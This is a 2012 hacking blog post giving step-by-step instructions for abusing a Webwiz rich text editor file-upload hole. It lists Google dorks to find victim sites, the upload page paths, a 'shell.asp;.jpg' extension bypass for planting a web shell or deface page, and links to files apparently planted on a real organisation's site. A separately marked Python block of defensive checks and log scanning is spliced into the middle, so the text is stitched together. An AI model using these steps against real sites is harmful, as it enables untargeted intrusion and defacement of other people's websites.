Sunday, April 8, 2012
Website hackz RTE webwiz vulnerability | file upload exploit
RTE exploit: file upload vulnerability of Webwiz websites
Webwiz rich text editor HTML code is carried in the
open after they are sent charCode due functioning of the page
Google Dorks:
[1] inurl:rte/my_documents/my_files
[2] inurl:/my_documents/my_files/
Search these dorks on Google and choose any website.
Exploit:
[1] website.com/rte/RTE_popup_file_atch.asp
[2] website.com/admin/RTE_popup_file_atch.asp
Site: http://www.example.com
http://www.example.com/RTE_popup_file_atch.asp
Now you will receive an upload option.
You can also upload a shell or directly your deface page.
Shell format: shell.asp;.jpg
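A defender-side check for the upload path described above, added here as an example and not code from the original post or from Web Wiz: it shows why a last-extension filter accepts the `shell.asp;.jpg` name while a strict allowlist rejects it, and flags the same pattern in web server logs. The function names, the extension sets and the log field layout are assumptions.

```python
import re
from urllib.parse import unquote

# Assumed values: tune both sets to the server's real handler mappings and policy.
SCRIPT_EXTS = {"asp", "asa", "cer", "cdx", "aspx", "ashx", "php"}
ALLOWED_EXTS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}
UPLOAD_PAGE = "rte_popup_file_atch.asp"      # upload page named in the post
UPLOAD_DIR = "/my_documents/my_files/"       # upload directory named in the post

def naive_is_allowed(name):
    """Weak check: looks only at the text after the last dot."""
    return name.rsplit(".", 1)[-1].lower() in ALLOWED_EXTS

def strict_is_allowed(name):
    """Accept only 'basename.ext': safe characters, one dot, allowlisted extension."""
    m = re.fullmatch(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})", name)
    return bool(m) and m.group(1).lower() in ALLOWED_EXTS

def has_script_segment(name):
    """True if any '.'- or ';'-separated part after the base name is a script extension."""
    return any(p in SCRIPT_EXTS for p in re.split(r"[.;]", name.lower())[1:])

def scan_log(lines):
    """Return (line_number, reason) for suspicious requests in a W3C-format log."""
    findings, cols = [], []
    for no, line in enumerate(lines, 1):
        if line.startswith("#Fields:"):
            cols = line.split()[1:]          # column names for the records that follow
            continue
        if line.startswith("#") or not cols or not line.strip():
            continue
        rec = dict(zip(cols, line.split()))
        path = unquote(rec.get("cs-uri-stem", ""))
        if rec.get("cs-method") == "POST" and path.lower().endswith(UPLOAD_PAGE):
            findings.append((no, "POST to RTE upload page"))
        elif UPLOAD_DIR in path.lower() and has_script_segment(path.rsplit("/", 1)[-1]):
            findings.append((no, "script-like file name in upload directory"))
    return findings

# Constructed sample log (not real traffic); the field layout is an assumption.
SAMPLE_LOG = """#Fields: date time cs-method cs-uri-stem sc-status
2012-04-08 10:00:01 GET /rte/my_documents/my_files/photo.jpg 200
2012-04-08 10:00:05 POST /rte/RTE_popup_file_atch.asp 200
2012-04-08 10:00:09 GET /rte/my_documents/my_files/shell.asp;.jpg 200
2012-04-08 10:00:12 GET /index.asp 200""".splitlines()

if __name__ == "__main__":
    for name in ("photo.jpg", "shell.asp;.jpg"):
        print(name, naive_is_allowed(name), strict_is_allowed(name))
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The strict check belongs on the server side of the upload handler, and the upload directory should also have script execution disabled so that a stored file is never run.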
live demo:
[1] http://www.jrf.org.tw/newjrf/rte/my_documents/my_files/ZFZ_!nD!_C0d3_Br3ak3.html
[2] http://www.jrf.org.tw/newjrf/rte/my_documents/my_files/4FB_cyb3r_shr3y@sh.jpg
Blog Warning:
HEY VISITORS THIS IS A NOTE FROM ADMIN:
THIS WEBSITE IS BUILD BY ME ONLY FOR EDUCATIONAL PURPOSE I JUST WANT TO PROVIDE CYBER TIPS SO IF U USE THESE INFORMATION TO HARM ANY SUBSTANCE,COMMUNITY OR PERSON AND GOT CAUGHT THEN I AM NOT RESPONSIBLE FOR IT SO MIND MY WORDS HACKING IS A CYBER CRIME DON'T CHEAT OTHERS WITH YOUR POWERS
KNOWLEDGE IS FOR SHARING ASK-SHARE
FOR MORE INFORMATION MAIL ME:
STSHREYASH50@GMAIL.COM